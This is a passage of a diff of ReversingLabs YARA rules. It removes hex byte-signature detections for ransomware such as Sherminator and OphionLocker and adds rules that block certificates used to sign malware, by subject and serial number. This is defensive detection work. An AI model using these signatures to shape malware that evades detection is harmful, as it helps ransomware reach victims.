-            A3 ?? ?? ?? ?? 89 65 ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 75 ?? 89 B5 ?? ?? ?? ?? 8B 4D
-            ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? ?? ?? ??
-            8B C6 8D 50 ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 06 ?? ?? 74 ?? 8B C6 8D 50
-            ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 06 ?? ?? 74 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? 52 EB ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 6A
-            ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B C6
-            8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8D 85 ?? ?? ?? ?? 8D 78 ?? 8A 08 40 84 C9
-            75 ?? 2B C7 03 C2 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B C3 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 83 F8 ?? 76 ?? B8 ?? ?? ??
-            ?? EB ?? 8B C3 8D 50 ?? 8D 64 24 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 53 8D 55 ?? 52 E8
-        }
-		$find_files_p2 = {
-            83 C4 ?? 33 FF 8D 45 ?? 8D 50 ?? 90 8A 08 40 84 C9 75 ?? 2B C2 74 ?? EB ?? 8D 49 ??
-            0F BE 44 3D ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 88 44 3D ?? 47 8D 45 ?? 8D 50 ?? 8D A4 24
-            ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F8 72 ?? 8D 4D ?? 51 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8A 10 3A
-            11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB
-            ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B
-            C2 80 7C 30 ?? ?? 74 ?? 8B C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 30 ?? ?? 74
-            ?? 8D 85 ?? ?? ?? ?? 50 56 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 EB ?? 8D 95 ?? ?? ??
-            ?? 52 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B BD ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 68 ?? ?? ?? ?? 6A ?? 8B 9D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 53 57 8B 55 ??
-            52 8D BD ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ??
-            E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? C3 8B 65 ?? C7 45 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C6 8D 50 ?? 8B FF
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $drop_ransom_note_p* ) ) and ( all of ( $find_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "33:41:21:68:ee:b3:c0:e4:c7:dd:05:08:a9:ff:ec:d5" and 1467590400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sherminator : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_422Ab71Ac7Fb125Ad7171B0C99510B0E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sherminator ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "99792a22-8027-557f-927f-30eac4d1e690"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "002e344e-a073-5d00-9488-d73fad51c66a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Sherminator.yara#L1-L157"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "22ac61b95f6ca4530e81a23fdd05be93e368647ca7100097a94eae3c6ce3b7d1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16962-L16978"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7366e5064a9a9f66260730575327e404eadea096ba3f6cf28c83c47bef9bca58"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sherminator"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_resources_p1 = {
-            55 89 E5 57 53 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24
-            ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 45 ?? 83 7D ??
-            ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 89 54
-            24 ?? 8B 55 ?? 89 54 24 ?? 8D 55 ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89
-            45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 89
-        }
-		$enum_resources_p2 = {
-            45 ?? 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45
-            ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? 8B 15 ??
-            ?? ?? ?? 8B 0D ?? ?? ?? ?? C1 E1 ?? 8D 1C 0A C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ??
-            ?? ?? ?? 89 03 A1 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? C1 E2 ?? 01 D0 8B 00 85 C0 0F 84 ??
-            ?? ?? ?? 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 50 ?? A1 ?? ?? ?? ?? 8B 0D ?? ??
-            ?? ?? C1 E1 ?? 01 C8 8B 00 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 15
-            ?? ?? ?? ?? C1 E2 ?? 01 D0 8B 10 89 D0 B9 ?? ?? ?? ?? 89 C3 B8 ?? ?? ?? ?? 89 DF F2
-            AE 89 C8 F7 D0 83 E8 ?? 01 D0 66 C7 00 ?? ?? A1 ?? ?? ?? ?? 83 C0 ?? A3 ?? ?? ?? ??
-            8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 83 E0 ?? 85 C0 74 ?? 8B 45 ?? C1 E0
-            ?? 89 C2 8B 45 ?? 01 D0 89 04 24 E8 ?? ?? ?? ?? EB ?? 90 83 45 ?? ?? 8B 45 ?? 39 45
-            ?? 0F 82 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ??
-            ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 90 90 8D 65 ?? 5B 5F 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 89 E5 57 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? C7 44 24 ?? ?? ?? ??
-            ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ??
-            ?? A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45
-            ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8B 45 ?? 01
-            D0 66 C7 00 ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ??
-            89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89
-            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 89 55
-            ?? 83 7D ?? ?? 7F ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 77 ?? C7 44 24 ?? ?? ?? ?? ?? 8B
-            45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24
-            ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ??
-            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 45 ?? ?? ?? ?? ?? DF 6D ??
-            DD 5D ?? DD 45 ?? DD 05 ?? ?? ?? ?? DF E9 DD D8 76 ?? 8B 45 ?? 89 45 ?? EB ?? C7 45
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83
-            7D ?? ?? 75 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC
-        }
-		$encrypt_files_p2 = {
-            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF
-            D0 C7 45 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 15 ??
-            ?? ?? ?? A1 ?? ?? ?? ?? 8D 4D ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 75 ?? C7 04 24 ??
-            ?? ?? ?? A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ??
-            ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ??
-            ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 04 24 ?? ?? ?? ?? A1
-            ?? ?? ?? ?? FF D0 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89
-            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 75 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04
-            24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B
-            45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8
-            ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ??
-            ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83
-            7D ?? ?? 74 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44
-            24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45
-        }
-		$encrypt_files_p3 = {
-            89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC
-            ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? 39 55 ?? 7F ?? 39 55 ?? 7C ?? 39
-            45 ?? 77 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ??
-            89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 54 24 ?? 8D 55 ?? 89 54 24 ?? 8B 55 ??
-            89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? 29 45 ??
-            19 55 ?? 83 7D ?? ?? 0F 8F ?? ?? ?? ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 0F 87 ?? ?? ??
-            ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ??
-            ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0
-        }
-		$find_files_p1 = {
-            55 89 E5 57 53 81 EC ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? C7 44 24
-            ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 89 04 24
-            E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44
-            24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ??
-            89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8B 45 ?? 01 D0 C7 00 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F
-            84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F B6 95 ?? ?? ??
-            ?? 0F B6 05 ?? ?? ?? ?? 0F B6 D2 0F B6 C0 29 C2 89 D0 85 C0 0F 84 ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ??
-            89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83
-            E0 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? ??
-            ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 01 D8 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24
-        }
-		$find_files_p2 = {
-            E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ??
-            89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8
-            ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D
-            50 ?? 8B 45 ?? 01 D0 66 C7 00 ?? ?? A1 ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ??
-            C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0
-        }
-		$find_files_p3 = {
-            89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04
-            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 01 D8 83
-            C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B
-            45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 44
-            24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? 89 44 24
-            ?? C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 EB ?? 90 EB ?? 90 EB ?? 90 EB ?? 90 EB
-            ?? 90 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ??
-            85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89
-            04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "42:2a:b7:1a:c7:fb:12:5a:d7:17:1b:0c:99:51:0b:0e" and 1475193600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ophionlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6F18946E5B773B7E32D9E7B4Fb8D434C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects OphionLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "75335749-66bd-539e-92b3-dd92c0b332d8"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "53205508-568c-5356-9717-2915c8f3806c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.OphionLocker.yara#L1-L105"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3c54a948a6a45ec5f5bc32fbbdbc8822f402b1332e9109b20b90635464dbe2ac"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16980-L16996"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fa285c17b43d1acdb05888074ecb16047209ade8f7f6191274f58eca7438dadf"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "OphionLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$ol_do_filetypes_1 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 57 33 DB 53 89 5D ?? 53 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 89 45 ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-        }
-		$ol_do_filetypes_2 = {
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
